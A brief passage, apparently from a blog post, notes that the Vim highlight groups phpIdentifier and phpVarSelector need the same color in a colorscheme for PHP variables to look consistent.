which means that I need to set both phpIdentifier and phpVarSelector to the same color in my colorscheme to have a consistant look.

Categories